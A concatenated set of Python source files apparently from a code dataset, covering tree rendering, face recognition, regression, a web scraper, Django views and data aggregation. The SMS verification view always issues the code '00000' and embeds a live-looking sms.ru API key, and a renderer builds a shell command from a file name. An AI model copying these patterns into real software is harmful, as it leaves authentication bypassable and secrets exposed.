'middle',\n font_family = self.font_family,\n fill = color\n )]\n\n def to_document(self):\n\n self.start_x = self.margin\n self.start_y = self.margin\n\n\n self.document = svgwrite.Drawing()\n self.document['width'] = str(self._width()) + 'px'\n self.document['height'] = str(self._height()) + 'px'\n\n for obj in self.obj:\n parts = obj()\n map(self.document.add, parts)\n\n# self.document.add(self.document.rect(\n# insert = (0, 0),\n# size = (self._width(), self._height()),\n# fill = 'none',\n# stroke = 'black'\n# ))\n\n\n return self.document\n\n def to_svg(self):\n doc = self.to_document()\n 
return doc.tostring()\n\n    def to_html(self, svg = None):\n        if svg is None:\n            svg = self.to_svg()\n\n        html = '<html><body>' + svg + '</body></html>'\n\n        return html\n\n    def _height(self):\n        return self._h(self.height) + self.margin * 2\n\n    def _width(self):\n        return self._w(self.width) + self.margin * 2\n\n    def write_html(self, file = 'tree.html'):\n        with open(file, 'w') as f:\n            f.write(self.to_html())\n\n    def save_pdf(self, file='tree.pdf'):\n        h = self._height()\n        w = self._width()\n\n        h_margin = 3.5\n        v_margin = 3.5\n\n        page_height =str(25.4 / 75.0 * h + v_margin)+'mm'\n        page_width =str(25.4 / 75.0 * w + h_margin)+'mm'\n\n        with open('tree_xxx.html', 'w') as f:\n            f.write(self.to_html())\n\n        bashCommand = \"wkhtmltopdf -l --page-width \" + page_width + \" --page-height \" + page_height + \" --disable-smart-shrinking -B 1mm -L 1mm -R 1mm -T 1mm tree_xxx.html \" + file\n        os.system(bashCommand)\n\n    def clear(self):\n        self.obj = []\n\n\n\nclass PathTreeBuilder(object):\n    def __init__(self, storage, op=None, states = None):\n        self.rejected = False\n        self.p_x = dict()\n        self.p_y = dict()\n        self.obj = list()\n        self.storage = storage\n        self.renderer = TreeRenderer()\n        self.op = op\n        if states is None:\n            states = {}\n        self.states = states\n\n    @staticmethod\n    def construct_heritage(storage, sample):\n        list_of_samples = []\n\n        samp = sample\n\n        while len(samp.details.inputs) > 0:\n            if len(samp.details.inputs) == 1:\n                # just one sample so use this\n                list_of_samples.append(samp)\n                samp = samp.details.inputs[0]\n            else:\n                # if there is more than one input choose the most useful one\n                # e.g. for ReplicaExchange the initial one\n                found_one = False\n                for input in samp.details.inputs:\n                    if input.trajectory == list_of_samples[-1].trajectory:\n                        # got it\n                        found_one = True\n                        samp = input\n                        break\n\n                if not found_one:\n                    break\n\n        # reverse to get origin first\n        return [samp for samp in reversed(list_of_samples)]\n\n    def from_samples(self, samples, clear=True):\n        if len(samples) == 0:\n            # no samples, nothing to do\n            # TODO: Raise an exception or just ignore and don't output anything?\n            return\n\n        p_x = dict()\n        p_y = dict()\n\n        if clear:\n            self.renderer.clear()\n\n        t_count = 0\n        shift = 0\n\n        lightcolor = \"gray\"\n\n        for sample in samples:\n            if hasattr(sample.details, 'start_point'):\n                old_traj = sample.details.start_point.trajectory\n                old_index = sample.details.start_point.index\n                old_conf = old_traj[old_index].configuration\n\n                new_traj = sample.details.final_point.trajectory\n                new_index = sample.details.final_point.index\n                new_conf = new_traj[new_index].configuration\n\n                accepted = sample.details.accepted\n\n                if sample.trajectory is new_traj or self.rejected:\n                    t_count += 1\n                    if not old_conf in p_x:\n                        for pos, snapshot in enumerate(old_traj):\n                            conf = snapshot.configuration\n                            p_x[conf] = pos\n                            p_y[conf] = t_count\n\n                            pos_x = p_x[conf]\n                            pos_y = p_y[conf]\n                            if self.op is not None:\n                                self.renderer.add(self.renderer.block(pos_x, pos_y, \"black\", self.op(snapshot)))\n                            else:\n                                self.renderer.add(self.renderer.block(pos_x, pos_y, \"black\", \"\"))\n\n                        self.renderer.add(\n                            self.renderer.label(0, t_count, 1, str(self.storage.idx(new_traj)) + 'b', align='end',color='black')\n                        )\n\n                        t_count += 1\n\n                    shift = p_x[old_conf] - new_index\n\n\n                fontcolor = \"black\"\n\n                draw_okay = False\n\n                mover_name = ''\n\n                if hasattr(sample.details, 'mover'):\n                    mover_name = sample.details.mover.name\n\n                if mover_name == \"BackwardShootMover\":\n                    color = \"green\"\n                    if not accepted:\n                        color = lightcolor\n                        fontcolor = lightcolor\n                    self.renderer.add(\n                        
self.renderer.v_connection(shift + new_index, p_y[old_conf], t_count, color)\n )\n self.renderer.add(\n self.renderer.label(shift, t_count, 1, str(self.storage.idx(new_traj)) + 'b', align='end',color=fontcolor)\n )\n draw_okay = True\n elif mover_name == 'ForwardShootMover':\n color = \"red\"\n if not accepted:\n color = lightcolor\n fontcolor = lightcolor\n self.renderer.add(\n self.renderer.v_connection(shift + new_index + 1, p_y[old_conf], t_count, color)\n )\n self.renderer.add(\n self.renderer.label(shift + len(new_traj) - 1, t_count, 1, str(self.storage.idx(new_traj)) + 'f', align='start',color=fontcolor)\n )\n draw_okay = True\n\n if not accepted:\n color = lightcolor\n\n if draw_okay:\n for pos, snapshot in enumerate(new_traj):\n conf = snapshot.configuration\n if not conf in p_y:\n p_y[conf] = t_count\n p_x[conf] = shift + pos\n\n pos_x = p_x[conf]\n pos_y = p_y[conf]\n if self.op is not None:\n self.renderer.add(self.renderer.block(pos_x, pos_y, color, self.op(snapshot)))\n else:\n self.renderer.add(self.renderer.block(pos_x, pos_y, color, \"\"))\n\n self.p_x = p_x\n self.p_y = p_y\n\n min_x, max_x = self._get_min_max(self.p_x)\n min_y, max_y = self._get_min_max(self.p_y)\n\n self.renderer.shift_x = min_x - 1.5\n self.renderer.shift_y = 0\n self.renderer.height = max_y - min_y + 2.0\n self.renderer.width = max_x - min_x + 3.0\n\n op_names = { arg[0] : arg[1] for arg in self.states }\n ops = {op : self.storage.collectivevariable.load(op) for op in op_names.keys() }\n\n matrix = self._to_matrix()\n\n for y in range(0, max_y - min_y + 1):\n rr = { op_name : None for op_name in op_names.keys() }\n yp = y + min_y\n for x in range(0, (max_x - min_x + 1)):\n xp = x + min_x\n for r in rr:\n op = ops[r]\n if matrix[y][x] is not None and bool(op(matrix[y][x])):\n if rr[r] is None:\n rr[r] = xp\n else:\n if rr[r] is not None:\n self.renderer.pre(\n self.renderer.shade(rr[r], yp, xp - rr[r], op_names[r])\n )\n rr[r] = None\n\n for r in rr:\n if rr[r] is not None:\n self.renderer.pre(\n self.renderer.shade(rr[r], yp, xp - rr[r] + 1, op_names[r])\n )\n\n\n\n def _get_min_max(self, d):\n return min(d.values()), max(d.values())\n\n def _to_matrix(self):\n min_x, max_x = self._get_min_max(self.p_x)\n min_y, max_y = self._get_min_max(self.p_y)\n\n matrix = [[None] * (max_x - min_x + 1) for n in range(max_y - min_y + 1)]\n\n for s in self.p_x:\n px = self.p_x[s]\n py = self.p_y[s]\n matrix[py - min_y][px - min_x] = s\n\n return matrix","sub_path":"openpathsampling/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":15842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"202098391","text":"#! 
/usr/bin/env python\n\nfrom mvnc import mvncapi as mvnc\nimport numpy, cv2\nimport sys, os\nimport cPickle as pickle \nimport utilities\nimport tensorflow as tf\nimport openface\n\ncurr = os.getcwd()\n\nGRAPH_FILENAME = \"facenet_celeb_ncs.graph\"\nFACE_MATCH_THRESHOLD = 1.2\n\nDLIB_FACE_PREDICTOR = \"shape_predictor_68_face_landmarks.dat\"\n\ngraph = None\nmodel = None\nalign = None\n\ndef setup(gpu_memory_fraction=0.25):\n \n global graph, model, align\n\n print('Loading NCS graph')\n\n devices = mvnc.EnumerateDevices()\n if len(devices) == 0:\n print('No NCS devices found')\n quit()\n\n # Pick the first stick to run the network\n device = mvnc.Device(devices[0])\n\n # Open the NCS\n device.OpenDevice()\n\n # The graph file that was created with the ncsdk compiler\n graph_file_name = GRAPH_FILENAME\n\n # read in the graph file to memory buffer\n with open(graph_file_name, mode='rb') as f:\n graph_in_memory = f.read()\n\n # create the NCAPI graph instance from the memory buffer containing the graph file.\n graph = device.AllocateGraph(graph_in_memory)\n\n with open('model.pkl', 'rb') as mod:\n model = pickle.load(mod)\n\n align = openface.AlignDlib(DLIB_FACE_PREDICTOR)\n\ndef run(input_image):\n\n if (graph == None or model == None or align == None):\n print(\"Run setup function once first\")\n return []\n\n infer_image = cv2.imread(input_image)\n input_vector = utilities.run_inference(infer_image, graph, align)\n match = utilities.run_image(model, input_vector)\n # os.remove(input_image)\n return [match]\n\nif __name__ == \"__main__\":\n #print(run(sys.argv[1]))\n setup()\n","sub_path":"Demo/Final/faceRecognition.py","file_name":"faceRecognition.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"414022382","text":"# A multiple linear regression algorithm is the same as a normal linear regression, except we have multiple input variables (features)\n\n# Importing libraries\nimport numpy as np\nimport pandas as pd\n\n# Reading data\n# var1, var2, var3 are the variables of interest in our dataset\ndf = pd.read_csv(\"\")\nV1 = df[\"var1\"].values\nV2 = df[\"var2\"].values\nV3 = df[\"var3\"].values\n\n# We will optimize our cost function using the gradient descent algorithm. 
Here we set this up\nn = len(V1)\nx0 = np.ones(n)\nX = np.array([x0, V1, V2]).T\n# Starting coefficients\nB = np.array([0,0,0])\nY = np.array(V3)\nalpha = 0.0001\n\n# Now defining our cost function\ndef cost_function(X, Y, B):\n n = len(Y)\n J = np.sum((X.dot(B)-Y)**2)/(2*n)\n return J\n\n# We can now define our gradient descent function\ndef gradient_descent(X, Y, B, alpha, iterations):\n cost_history = [0] * iterations\n n = len(Y)\n for iteration in range(iterations):\n # Hypothesis Values\n h = X.dot(B)\n # Difference b/w Hypothesis and Actual Y\n loss = h - Y\n # Gradient Calculation\n gradient = X.T.dot(loss) / n\n # Changing Values of B using Gradient\n B = B - alpha * gradient\n # New Cost Value\n cost = cost_function(X, Y, B)\n cost_history[iteration] = cost\n\n return B, cost_history\n\n# Having now defined our gradient descent and cost function we can compute the final value of B\nnewB, cost_history = gradient_descent(X, Y, B, alpha, 100000)\nprint(newB)\nprint(cost_history[-1])\n\n# We can now evaluate our model accuracy using RMSE and R2 score\n\nY_pred = X.dot(newB)\n\n# RMSE\ndef rmse(Y, Y_pred):\n rmse = np.sqrt(sum((Y - Y_pred) ** 2) / len(Y))\n return rmse\n\n# R2 Score\ndef r2_score(Y, Y_pred):\n mean_y = np.mean(Y)\n ss_tot = sum((Y - mean_y) ** 2)\n ss_res = sum((Y - Y_pred) ** 2)\n r2 = 1 - (ss_res / ss_tot)\n return r2\n\nprint(rmse(Y, Y_pred))\nprint(r2_score(Y, Y_pred))","sub_path":"SupervisedLearning/multiple_linear_regression.py","file_name":"multiple_linear_regression.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"70253104","text":"from panoptes.utils import error\n\n\ndef on_enter(event_data):\n \"\"\"\n In the `scheduling` state we attempt to find a field using our scheduler. If field is found,\n make sure that the field is up right now (the scheduler should have taken care of this). If\n observable, set the mount to the field and calls `start_slewing` to begin slew.\n\n If no observable targets are available, `park` the unit.\n \"\"\"\n pocs = event_data.model\n pocs.next_state = 'observing'\n\n # If it is not dark enough to observe, go back to ready state\n # The ready state will then decide whether to park, focus, take flats etc\n if not pocs.is_dark(horizon='observe'):\n pocs.say('Not dark enough to continue scheduling. Going back to the ready state.')\n pocs.next_state = \"ready\"\n return\n\n pocs.say(\"Selecting the next target to observe...\")\n existing_observation = pocs.observatory.current_observation\n\n # Get the next observation\n try:\n observation = pocs.observatory.get_observation()\n pocs.logger.info(f\"Observation: {observation}\")\n\n except error.NoObservation:\n pocs.say(\"No valid observations found. Going back to the ready state.\")\n pocs.next_state = 'ready'\n return\n\n except Exception as e:\n pocs.logger.warning(f\"Error in scheduling: {e!r}. 
Going back to the ready state.\")\n pocs.next_state = 'ready'\n return\n\n if existing_observation and observation.name == existing_observation.name:\n pocs.say(f\"I'm sticking with {observation.name}.\")\n pocs.observatory.current_observation = existing_observation\n\n else:\n pocs.say(f\"I'm going to check out: {observation.name}.\")\n","sub_path":"src/huntsman/pocs/states/huntsman/scheduling.py","file_name":"scheduling.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"321502433","text":"import torch\nimport pandas as pd\nimport numpy as np\nfrom trainOps import DataLoader, compute_loss, get_mask, compute_prediction_loss\n\nCONST_LEN = 28\n\n\ndef make_prediction(model, dat, src_m, tar_m, datLoader, device):\n # send model to GPU\n model.to(device)\n model.eval()\n # send tensors to GPU\n src_mask, tar_mask = src_m.to(device), tar_m.to(device)\n mu = torch.Tensor(datLoader.mu).to(device)\n scale = torch.Tensor(dataLoader.scale).to(device)\n id = []\n pred = []\n for i, (batch_id, cat, x, y) in enumerate(datLoader.get_submission_batch(dat)):\n # print(\"prediction mini-batch : \", i)\n id.extend(batch_id)\n cat, x, y = cat.to(device), x.to(device), y.to(device)\n out = model.forward(cat, x, y, src_mask, tar_mask)\n v_out = out.squeeze(1) * scale[CONST_LEN:] + mu[CONST_LEN:]\n flag = torch.round(v_out) > 0\n v_out = flag * torch.ceil(v_out)\n v_out = v_out.cpu().numpy()\n v_out = v_out[:, -CONST_LEN:]\n # print(v_out[1, 1:])\n # print(\"=====\")\n pred.extend(v_out.tolist())\n # print(id[:5])\n output = pd.DataFrame(pred, index=id, columns=[\"F\"+str(i) for i in range(1, 29)])\n output.index.name = \"id\"\n return output\n\n\ndef load_model(checkpoint_path):\n # load model\n # replace x by the epoch number\n checkpoint = torch.load(checkpoint_path)\n model = checkpoint[\"model\"]\n model.load_state_dict(checkpoint[\"state_dict\"])\n for parameter in model.parameters():\n parameter.requires_grad = False\n return model\n\n\n# set up GPU\ndevice = torch.device(\"cpu\")\nmodel = load_model(\"10_checkpoint.pth\")\nprint(\"Model loaded ...\")\n\ndataLoader = DataLoader('small_X.csv', batch_size=16, cat_exist=True, split=(90, 5, 5))\nsrc_mask, tar_mask = get_mask(4 * CONST_LEN, random=False)\n\nprint(\"validation set loaded ...\")\ndat = pd.read_csv(\"valid_X_pred.csv\", header=None)\nvalid_pred = make_prediction(model, dat, src_mask, tar_mask, dataLoader, device)\nprint(\"validation set prediction done ...\")\n\nprint(\"evaluation set loaded ...\")\ndat_ = pd.read_csv(\"eval_X_pred.csv\", header=None)\neval_pred = make_prediction(model, dat_, src_mask, tar_mask, dataLoader, device)\nprint(\"evaluation set prediction done ...\")\n\noutput = pd.concat([valid_pred, eval_pred], axis=0)\noutput.to_csv(\"prediction_.csv\")\n\n","sub_path":"submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"383581610","text":"\"\"\"javascript URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. 
Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom core import views as core_views\nfrom githubfinder import views as githubfinder_views\nfrom weatherapi import views as weatherapi_views\n\nurlpatterns = [\n path('', core_views.index, name=\"index\"),\n path('dom/', core_views.dom, name=\"dom\"),\n path('dom_projects/', core_views.dom_projects, name=\"dom_projects\"),\n path('poo/', core_views.poo, name=\"poo\"),\n path('book_list/', core_views.book_list, name=\"book_list\"),\n path('xhr/', core_views.xhr, name=\"xhr\"),\n path('json/', core_views.json, name=\"json\"),\n path('chuck_norris/', core_views.chuck_norris, name=\"chuck_norris\"),\n path('callback/', core_views.callback, name=\"callback\"),\n path('easy_http/', core_views.easy_http, name=\"easy_http\"),\n path('promises/', core_views.promises, name=\"promises\"),\n path('fetch_api/', core_views.fetch_api, name=\"fetch_api\"),\n path('arrow_functions/', core_views.arrow_functions, name=\"arrow_functions\"),\n path('easy_http_2/', core_views.easy_http_2, name=\"easy_http_2\"),\n path('async_await/', core_views.async_await, name=\"async_await\"),\n path('fetch_async/', core_views.fetch_async, name=\"fetch_async\"),\n path('githubfinder/', include('githubfinder.urls')),\n path('weatherapi/', include('weatherapi.urls')),\n path('errorhandling/', include('errorhandling.urls')),\n path('regex/', include('regex.urls')),\n path('regexform/', include('regexform.urls')),\n path('newerfeatures/', include('newerfeatures.urls')),\n path('patterns/', include('patterns.urls')),\n path('tracalorie/', include('tracalorie.urls')),\n path('admin/', admin.site.urls),\n]\n","sub_path":"Traversy/javascript/javascript/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"420791201","text":"\"\"\"\n@Project :FTP大作业完整版\n@Time :2018/09/01 15:44\n@Author :Zhenxian\n@File :s.py\n@Software :PyCharm\n\"\"\"\nimport socket\n\nHOST = '127.0.0.1' # loop back host\nPORT = 8080 # the port number must be greater than or equal to 1024\nADDRESS = (HOST, PORT) # must be a tuple\n\nss = socket.socket() # create socket\nss.bind(ADDRESS) # bind ADDRESS\nss.listen() # listen\ncon, add = ss.accept() # accept a tuple (socket_object,address)\nprint(con, add)\nres = con.recv(1024)\nprint(res)\ncon.send(b'Hello') # send binary\n\ncon.close() # close con\nss.close() # close socket_object\n","sub_path":"FTP大作业完整版/普通socket通信/s.py","file_name":"s.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"231259671","text":"from rest_framework import viewsets, decorators, serializers, response, status, permissions\n# from django.db.models.\nimport string\nimport random\nimport datetime\nfrom django.db.models import ObjectDoesNotExist\nfrom urllib.request import urlopen\nfrom .models import Phone, Code\n\n\nclass PhoneSerializer(serializers.ModelSerializer):\n class Meta:\n model = Phone\n fields = ('id', 'phone')\n\n\nclass CodeSerializer(serializers.ModelSerializer):\n class Meta:\n model = Code\n fields = ('id', 'code')\n\n\ndef randomString(stringLength=5):\n \"\"\"Generate a random string of fixed length 
\"\"\"\n letters = string.digits\n # return ''.join(random.choice(letters) for i in range(stringLength))\n return '00000';\n\nclass PhoneViewSet(viewsets.ViewSet):\n @decorators.action(methods=['post'], detail=False, permission_classes=[permissions.AllowAny])\n def code(self, request):\n serializer = PhoneSerializer(data=request.data)\n if serializer.is_valid():\n phone = Phone.objects.get_or_create(phone=serializer.data['phone'])[0]\n code = Code.objects.create(phone=phone, code=randomString(),\n end=datetime.datetime.now() + datetime.timedelta(minutes=20))\n url = 'https://sms.ru/sms/send?api_id=903cf685-12bd-b4e4-31ef-a57dd97efe4b&json=1&to=%s&msg=Your+code+%s' % (\n phone.phone, code.code)\n urlopen(url)\n return response.Response({'status': 'ok'})\n return response.Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n @decorators.action(methods=['post'], detail=False, permission_classes=[permissions.AllowAny])\n def check(self, request):\n serializer = CodeSerializer(data=request.data)\n if serializer.is_valid():\n try:\n code = Code.objects.get(code=serializer.data['code'], phone__phone=request.data['phone'],\n end__gt=datetime.datetime.now())\n except ObjectDoesNotExist:\n return response.Response({'errors': 'not exist'})\n code.end = datetime.datetime.now()\n code.save()\n return response.Response({'status': 'ok'})\n return response.Response(serializer.errors)\n","sub_path":"phones/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"1132797","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport cv2\n\n# 下面的import 是一样的\n# import img.basev as ba\nfrom img import basev as ba\n\nimage = cv2.imread(ba.TEMP_IMG, cv2.IMREAD_UNCHANGED)\ncv2.imshow('img1', image)\ncv2.imshow('img2', image)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"how_to_use_cv2/read_an_image.py","file_name":"read_an_image.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"422371359","text":"import numpy\nimport openpyxl\n\n\nexcel_document = openpyxl.load_workbook('Muestra.xlsx')\nsheet = excel_document['Hoja 1']\n\ncant_personas_renun = 0\nnoproductivo = 0\ninfeliz = 0\nsinambicion = 0\nvivelejos = 0\ntienefamilia = 0\n\nfor persona in sheet.iter_cols(min_col=2, max_col=9):\n value = persona[9].value\n if value == 1: #Si la persona renunció\n cant_personas_renun += 1\n line = 0\n for preguntas in persona:\n line += 1\n if line == 2:\n noproductivo += preguntas.value\n elif line == 3:\n infeliz += preguntas.value\n elif line == 4:\n sinambicion += preguntas.value\n elif line == 5:\n vivelejos += preguntas.value\n elif line == 6:\n tienefamilia += preguntas.value\n\n #print('%s: cell.value=%s' % (cell, cell.value))\n\n\nporc_noproductivo = noproductivo * 100 / cant_personas_renun\nporc_infeliz = infeliz * 100 / cant_personas_renun\nporc_sinambicion = sinambicion * 100 / cant_personas_renun\nporc_vivelejos = vivelejos * 100 / cant_personas_renun\nporc_tienefamilia = tienefamilia * 100 / cant_personas_renun\n\n\nprint('No Productivos: %s' % (porc_noproductivo))\nprint('No es Feliz: %s' % (porc_infeliz))\nprint('No tiene ambición: %s' % (porc_sinambicion))\nprint('Vive lejos: %s' % (porc_vivelejos))\nprint('Tiene Familia: %s' % (porc_tienefamilia))\n\n\nnoproductivo = noproductivo / cant_personas_renun\ninfeliz = infeliz / cant_personas_renun\nsinambicion = 
sinambicion / cant_personas_renun\nvivelejos = vivelejos / cant_personas_renun\ntienefamilia = tienefamilia / cant_personas_renun\n\n\nopciones = ['Not productive', 'Not happy', 'No ambition', 'Lives far away', 'Has family']\nprobabilidades = [noproductivo, infeliz, sinambicion, vivelejos, tienefamilia]\n\neleccion = numpy.random.choice(opciones, p=probabilidades)\nprint()\nprint('It is very likely that an employee will leave the company because: %s' % (eleccion))\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"88413192","text":"from OWDTestToolkit.global_imports import *\n\nimport callThisNumber            ,\\\n       createContactFromThisNum  ,\\\n       hangUp                    ,\\\n       enterNumber               ,\\\n       openCallLog               ,\\\n       callLog_call              ,\\\n       callLog_createContact     ,\\\n       callLog_addToContact      ,\\\n       addThisNumberToContact    ,\\\n       _complete_addNumberToContact,\\\n       createMultipleCallLogEntries\n\nclass Dialer (\n    callThisNumber.main,\n    createContactFromThisNum.main,\n    hangUp.main,\n    enterNumber.main,\n    openCallLog.main,\n    callLog_call.main,\n    callLog_createContact.main,\n    callLog_addToContact.main,\n    addThisNumberToContact.main,\n    _complete_addNumberToContact.main,\n    createMultipleCallLogEntries.main):\n    \n    def __init__(self, p_parent):\n        self.apps = p_parent.apps\n        self.data_layer = p_parent.data_layer\n        self.parent = p_parent\n        self.marionette = p_parent.marionette\n        self.UTILS = p_parent.UTILS\n\n    def launch(self):\n        #\n        # Launch the app (it's registered under a different name than the one everyone knows it by, so hardcode it!).\n        #\n        self.app = self.apps.launch(\"Phone\")\n        self.UTILS.waitForNotElements(DOM.GLOBAL.loading_overlay, self.__class__.__name__ + \" app - loading overlay\")\n        return self.app\n    \n    \n    \n    ","sub_path":"OWDTestToolkit/apps/Dialer/__main.py","file_name":"__main.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"225905976","text":"# -*- coding: utf-8 -*-\nimport scrapy\n# from items.py import BossItem\nfrom boss.items import BossItem\n\n# class BossZhipinSpider(scrapy.Spider):\n#     name = 'boss_zhipin'\n#     allowed_domains = ['zhipin.com']\n#     start_urls = ['http://zhipin.com/']\n#\n#     def parse(self, response):\n#         pass\n\nclass ZhipinSpider(scrapy.Spider):\n    # define the spider's name\n    name = 'job'\n    # define the domains allowed to crawl\n    allowed_domains = ['www.zhipin.com']\n    # define the entry url\n    start_urls = ['https://www.zhipin.com/job_detail/?query=python&scity=101010100&industry=&position=']\n    # define the parsing rules; this method must be named parse\n    def parse(self, response):\n        # item = BossItem()\n        body = response.css(\".job-primary\")\n        for head in body:\n            item = BossItem()\n            item[\"title\"] = head.css(\".job-title::text\").extract()[0]\n            item[\"wage\"] = head.css(\".red::text\").extract()[0]\n            item[\"site\"] = head.css(\".info-primary p::text\").extract_first().strip()\n            item[\"name\"] = head.css(\".company-text .name a::text\").extract_first()\n            yield item\n        # pagination\n        next_page = response.css(\".page .next::attr(href)\").extract()[0]\n        if next_page is not None:\n            yield response.follow('https://www.zhipin.com'+next_page,callback=self.parse)\n            # the link is relative, so the domain has to be prepended\n\n\n\n\n\n","sub_path":"2018824/scrapy/boss/boss/spiders/boss_zhipin.py","file_name":"boss_zhipin.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"203095817","text":"import datetime\nimport sys\n\ndef csvToList(filename):\n    f 
= open(filename,'r')\n    dataStr = f.read() #read data as one string\n    lines = dataStr.split(\"\\n\") #get list of lines\n    table = {} # create our final destination: a dict of row dicts keyed by the first column\n    headers = lines[0].split(',') #line 0 is the headers - save these as a list\n    i = 0 # row/line counter\n    for line in lines: #go through each line\n        cols = line.split(',') #break each line into columns\n        if len(cols) == len(headers) and i != 0:#check to make sure each row has \n            #column for each header item \n            row = {} #create a new blank row dictionary\n            colNum = 1 #col counter - keep track of the col number\n            for field in headers[1:]: #go through each col and header\n                row[field] = cols[colNum] #set the dict. @ the field key to the cell data\n                colNum += 1 \n            table[cols[0]] = row # add the row dictionary to the table dict\n        i += 1\n    return table # return the finished table\n    \nhourlyWeather = csvToList('weather2013_2.csv')\nhours = hourlyWeather.keys()\n\n#print('\\n'.join(sorted(times[times.keys()[0]])))\n\ncolnames = [\"summary\",\n            \"precipIntensity\",\n            \"precipProbability\",\n            \"temperature\",\n            \"apparentTemperature\",\n            \"dewPoint\",\n            \"humidity\",\n            \"windSpeed\",\n            \"windBearing\",\n            \"visibility\",\n            \"pressure\"]\n\n\t\nfor month in [int(sys.argv[1])]:\n#    month+=1\n    print(month)\n    f = open('files\\mod{}.csv'.format(month), 'r')\n    hourlystats = {}\n    for i in hours:\n        hourlystats[i]={'count':0, 'count_tip':0, 'total_tip':0, 'count_toll':0, 'total_toll':0, 'total':0, 'cash':0,\n                        'card':0, 'disputed':0, 'nocharge':0, 'unknown':0}\n\n    buf = ',pickup_datetime,payment_type,tip_amount,tolls_amount,total_amount,'+','.join(colnames)+'\\n'\n    i=0\n    for line in f:\n        vals = line.split(',')\n        if i==0:\n            headers = vals\n        else:\n            timestamp = vals[0]\n            tipamount = float(vals[2])\n            tollamount = float(vals[3])\n            totalamount = float(vals[4])\n            paytype = vals[1]\n            currenthour = datetime.datetime.strptime(timestamp, '%Y-%m-%d %H:%M:%S') + datetime.timedelta(minutes=30)\n            # weatherhour = datetime.datetime.strftime(currenthour, '\"%Y-%m-%d %H:00:00\"')\n            weatherhour = datetime.datetime.strftime(currenthour, '%Y-%m-%d %H:00:00')\n            if weatherhour == '2013-03-10 02:00:00': weatherhour = '2013-03-10 03:00:00' #daylight saving\n            if weatherhour == '2014-01-01 00:00:00': weatherhour = '2013-12-31 23:00:00' #adding 30 minutes passes 2014 at the last day of month\n            hourlystats[weatherhour]['count'] += 1\n            if tipamount>0:\n                hourlystats[weatherhour]['count_tip'] += 1\n                hourlystats[weatherhour]['total_tip'] += tipamount\n            if tollamount>0:\n                hourlystats[weatherhour]['count_toll'] += 1\n                hourlystats[weatherhour]['total_toll'] += tollamount\n            if 'CSH' in paytype: hourlystats[weatherhour]['cash'] += 1\n            elif 'CRD' in paytype: hourlystats[weatherhour]['card'] += 1\n            elif 'DIS' in paytype: hourlystats[weatherhour]['disputed'] += 1\n            elif 'NOC' in paytype: hourlystats[weatherhour]['nocharge'] += 1\n            else: hourlystats[weatherhour]['unknown'] += 1\n            hourlystats[weatherhour]['total'] += totalamount\n        i+=1\n        if i%100000 == 0:\n            print(i)\n    f.close()\n\ng = open('hourlyStats{}.csv'.format(str(sys.argv[1])), 'w')\n\nbuf = ''\nnewheads = ['count','count_tip','total_tip','count_toll','total_toll','total','cash','card','disputed','nocharge','unknown']\nf = open('weather2013_2.csv', 'r')\ni=0\nfor line in f:\n    if i==0:\n        buf += line.split('\\n')[0] + ',' + ','.join(newheads) + '\\n'\n        i+=1\n    else:\n        tstamp = line.split(',')[0]\n        buf += (line.split('\\n')[0] + ',' + ','.join([str(hourlystats[tstamp][j]) for j in newheads]) + 
